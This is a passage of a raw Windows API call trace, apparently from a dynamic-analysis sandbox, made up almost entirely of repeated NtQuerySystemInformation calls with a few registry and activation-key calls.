Length=0x0, ResultLength=0x0) [0302.602] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.602] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.602] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.603] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.603] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.603] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.603] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.603] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.604] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.604] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.604] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.604] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.604] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.605] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.605] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.605] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.605] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.605] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.606] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.606] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.606] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.606] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.606] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.607] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.607] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.607] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.607] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.607] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.607] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.607] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.608] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.608] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.608] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.608] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.608] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.609] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.609] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.609] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.609] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.914] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217efa0, Length=0x30, ResultLength=0x0) [0302.914] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ee60, Length=0x18, ResultLength=0x0) [0302.914] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.915] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.916] RegFlushKey (hKey=0x3b4) returned 0x0 [0302.974] NtLockProductActivationKeys (pPrivateVer=0x0, pSafeMode=0x0) returned 0x0 [0302.977] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.977] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f070, Length=0x38, ResultLength=0x0) [0302.977] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.978] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f070, Length=0x38, ResultLength=0x0) [0302.978] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.978] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f070, Length=0x38, ResultLength=0x0) [0302.978] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217efb0, Length=0x30, ResultLength=0x0) [0302.978] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef10, Length=0x20, ResultLength=0x0) [0302.978] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.979] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.981] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217efb0, Length=0x30, ResultLength=0x0) [0302.981] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eef0, Length=0x30, ResultLength=0x0) [0302.981] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.982] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.982] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.982] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.982] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.982] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f2e0, Length=0x28, ResultLength=0x0) [0302.982] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.982] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f2e0, Length=0x28, ResultLength=0x0) [0302.983] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f1c0, Length=0x58, ResultLength=0x0) [0302.983] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.983] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f0b0, Length=0x38, ResultLength=0x0) [0302.985] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.986] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.989] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.991] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.991] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eef0, Length=0x28, ResultLength=0x0) [0302.991] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.991] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.991] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eef0, Length=0x28, ResultLength=0x0) [0302.991] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.991] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.992] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eef0, Length=0x28, ResultLength=0x0) [0302.992] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.992] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.992] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eef0, Length=0x28, ResultLength=0x0) [0302.992] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.992] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.992] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef60, Length=0x28, ResultLength=0x0) [0302.992] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.993] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.993] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f0b0, Length=0x38, ResultLength=0x0) [0302.993] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.993] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f0b0, Length=0x38, ResultLength=0x0) [0302.993] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.993] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217efe0, Length=0x28, ResultLength=0x0) [0302.997] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.997] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.997] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.998] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.998] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.998] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217efe0, Length=0x28, ResultLength=0x0) [0302.998] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.998] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.998] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f0b0, Length=0x38, ResultLength=0x0) [0302.999] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.999] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f0b0, Length=0x38, ResultLength=0x0) [0302.999] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.000] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.000] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.000] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.000] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.001] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ee50, Length=0x20, ResultLength=0x0) [0303.001] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217edd0, Length=0x20, ResultLength=0x0) [0303.001] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.001] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217edd0, Length=0x20, ResultLength=0x0) [0303.001] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.001] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217edd0, Length=0x20, ResultLength=0x0) [0303.002] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.002] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.002] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.002] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f020, Length=0x20, ResultLength=0x0) [0303.002] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.002] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.002] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f0b0, Length=0x38, ResultLength=0x0) [0303.003] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef40, Length=0x20, ResultLength=0x0) [0303.003] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eec0, Length=0x20, ResultLength=0x0) [0303.003] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.003] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eec0, Length=0x20, ResultLength=0x0) [0303.004] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.004] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eec0, Length=0x20, ResultLength=0x0) [0303.004] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.004] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.004] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.004] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.004] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f0b0, Length=0x38, ResultLength=0x0) [0303.004] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef40, Length=0x20, ResultLength=0x0) [0303.004] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eec0, Length=0x20, ResultLength=0x0) [0303.005] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.005] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eec0, Length=0x20, ResultLength=0x0) [0303.005] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.005] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eec0, Length=0x20, ResultLength=0x0) [0303.005] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.005] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.006] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.006] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.006] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f0b0, Length=0x38, ResultLength=0x0) [0303.006] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef40, Length=0x20, ResultLength=0x0) [0303.006] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eed0, Length=0x20, ResultLength=0x0) [0303.006] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.007] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.007] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.007] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eed0, Length=0x20, ResultLength=0x0) [0303.007] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.007] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.007] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.008] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.008] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.008] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.008] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f0f0, Length=0x40, ResultLength=0x0) [0303.009] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f010, Length=0x38, ResultLength=0x0) [0303.009] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef30, Length=0x38, ResultLength=0x0) [0303.010] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.010] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef30, Length=0x38, ResultLength=0x0) [0303.010] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.010] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef30, Length=0x38, ResultLength=0x0) [0303.011] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.011] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef30, Length=0x38, ResultLength=0x0) [0303.011] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.011] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef30, Length=0x38, ResultLength=0x0) [0303.012] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.012] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.012] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f010, Length=0x38, ResultLength=0x0) [0303.013] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef30, Length=0x38, ResultLength=0x0) [0303.013] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.014] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef30, Length=0x38, ResultLength=0x0) [0303.014] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.014] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef30, Length=0x38, ResultLength=0x0) [0303.016] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.016] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef30, Length=0x38, ResultLength=0x0) [0303.017] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.017] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef30, Length=0x38, ResultLength=0x0) [0303.017] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.018] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.018] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f010, Length=0x38, ResultLength=0x0) [0303.070] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef30, Length=0x38, ResultLength=0x0) [0303.070] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.070] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef30, Length=0x38, ResultLength=0x0) [0303.071] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.071] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef30, Length=0x38, ResultLength=0x0) [0303.071] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.071] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef30, Length=0x38, ResultLength=0x0) [0303.072] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.072] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef30, Length=0x38, ResultLength=0x0) [0303.072] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.073] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef30, Length=0x38, ResultLength=0x0) [0303.073] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.073] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef30, Length=0x38, ResultLength=0x0) [0303.074] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.074] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.074] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f010, Length=0x38, ResultLength=0x0) [0303.074] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef30, Length=0x38, ResultLength=0x0) [0303.075] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.075] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef30, Length=0x38, ResultLength=0x0) [0303.075] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.075] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef30, Length=0x38, ResultLength=0x0) [0303.076] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.076] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef30, Length=0x38, ResultLength=0x0) [0303.076] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.076] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef30, Length=0x38, ResultLength=0x0) [0303.077] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.077] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef30, Length=0x38, ResultLength=0x0) [0303.077] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.078] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef30, Length=0x38, ResultLength=0x0) [0303.078] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.078] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef30, Length=0x38, ResultLength=0x0) [0303.079] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.079] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef30, Length=0x38, ResultLength=0x0) [0303.080] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.080] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef30, Length=0x38, ResultLength=0x0) [0303.080] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.081] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef30, Length=0x38, ResultLength=0x0) [0303.081] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.081] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef30, Length=0x38, ResultLength=0x0) [0303.082] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.082] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef30, Length=0x38, ResultLength=0x0) [0303.082] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.083] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef30, Length=0x38, ResultLength=0x0) [0303.083] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.083] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef30, Length=0x38, ResultLength=0x0) [0303.084] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.084] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.084] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f010, Length=0x38, ResultLength=0x0) [0303.084] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef30, Length=0x38, ResultLength=0x0) [0303.085] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.085] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef30, Length=0x38, ResultLength=0x0) [0303.086] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.086] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef30, Length=0x38, ResultLength=0x0) [0303.086] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.086] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef30, Length=0x38, ResultLength=0x0) [0303.087] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.087] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef30, Length=0x38, ResultLength=0x0) [0303.087] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.087] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef30, Length=0x38, ResultLength=0x0) [0303.088] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.088] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef30, Length=0x38, ResultLength=0x0) [0303.088] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, 